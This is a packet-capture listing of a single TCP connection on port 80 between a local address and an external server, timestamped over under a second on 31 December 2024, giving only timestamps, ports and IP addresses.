Dec 31, 2024 09:48:42.477783918 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.477787971 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.477802038 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.477817059 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.478682041 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478693008 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478703022 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478718996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478729963 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478740931 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478743076 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.478750944 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478779078 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.478816986 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478827953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478833914 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478838921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478843927 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478848934 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478854895 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.478887081 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.478914022 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.659614086 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.664592981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664611101 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664623022 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664633989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664647102 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664657116 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.664658070 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664670944 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664701939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664712906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664724112 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664727926 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.664736032 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664747000 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.664747953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664758921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664763927 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.664771080 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664781094 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664792061 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664793015 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.664813042 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664824009 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664827108 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.664834976 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664846897 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664858103 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.664879084 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665070057 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665087938 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665098906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665110111 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665118933 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665119886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665131092 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665131092 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665142059 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665152073 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665163994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665174007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665175915 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665184975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665195942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665196896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665206909 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665211916 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665230989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665244102 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665254116 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665267944 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665277958 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665288925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665297985 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665299892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665304899 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665304899 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665311098 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665321112 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665324926 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665333033 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665335894 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665343046 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665354013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665364027 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665375948 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665384054 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665385962 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665397882 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665409088 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665411949 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665421009 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665427923 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665443897 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665453911 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665659904 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665672064 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665683985 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665693998 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665698051 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665704966 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665714979 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665721893 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665731907 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665743113 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665745020 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665752888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665760994 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665765047 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665775061 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665782928 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665786028 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665796995 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665800095 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665807962 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665818930 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665829897 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665841103 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665848970 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665852070 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665862083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665874004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665879011 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665884018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665894985 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665898085 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665906906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.665915012 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.665983915 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666126013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666136980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666147947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666157961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666167974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666172028 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666178942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666189909 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666199923 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666199923 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666207075 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666212082 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666217089 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666222095 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666228056 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666238070 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666254997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666265965 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666275024 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666275024 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666276932 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666292906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666296005 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666304111 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666311979 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666315079 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666326046 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666337013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666337967 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666347980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666357994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666366100 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666368961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666379929 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666382074 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666390896 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666403055 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666407108 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666414976 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666445017 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666464090 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666670084 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666682005 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666692019 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666702032 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666712046 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666721106 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666723013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666728973 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666739941 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666750908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666760921 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666764021 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666771889 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666783094 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666783094 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666799068 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666800022 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666810989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666821003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666832924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666841030 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666842937 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666853905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666861057 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666866064 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666876078 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666876078 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666887045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666897058 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666897058 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666908026 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666912079 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666913033 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666919947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666929960 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666944027 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666953087 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.666954041 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666965961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.666975975 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667021990 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667161942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667175055 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667185068 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667196035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667201042 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667207003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667217970 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667227030 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667253971 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667294979 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667306900 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667327881 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667337894 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667346001 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667356968 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667367935 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667378902 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667381048 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667391062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667392015 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667401075 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667408943 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667412043 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667422056 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667433023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667433977 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667443991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667455912 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667459965 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667465925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667478085 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667478085 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667490959 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667501926 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667529106 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667694092 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667705059 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667716026 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667726040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667737007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667747021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667757034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667763948 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667768002 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667778969 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667788982 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667793036 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667800903 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.667814970 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.667821884 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.690334082 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.690376043 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.690418959 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.728864908 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.728883982 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.728895903 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.728933096 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.728966951 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.728967905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.728979111 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.728988886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729008913 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729031086 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729043007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729053974 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729063988 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729075909 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729099989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729110956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729110956 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729121923 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729131937 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729134083 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729142904 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729160070 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729182959 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729243994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729258060 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729291916 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729326010 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729337931 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729355097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729365110 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729374886 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729374886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729391098 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729455948 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729465961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729475021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729487896 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729497910 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729505062 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729510069 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.729552031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.729552031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.730015039 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.730026960 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.730037928 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.730060101 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.730081081 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.730607986 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.730619907 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.730631113 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.730647087 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.730990887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.731004000 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.731014967 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.731025934 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.731036901 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.731060028 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.732079983 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732104063 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732115030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732125998 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732131004 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.732136965 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732147932 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732151031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.732165098 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732176065 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732177019 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.732187033 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732198000 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732201099 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.732232094 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.732260942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.732270956 CET	80	49754	185.215.113.16	192.168.2.6
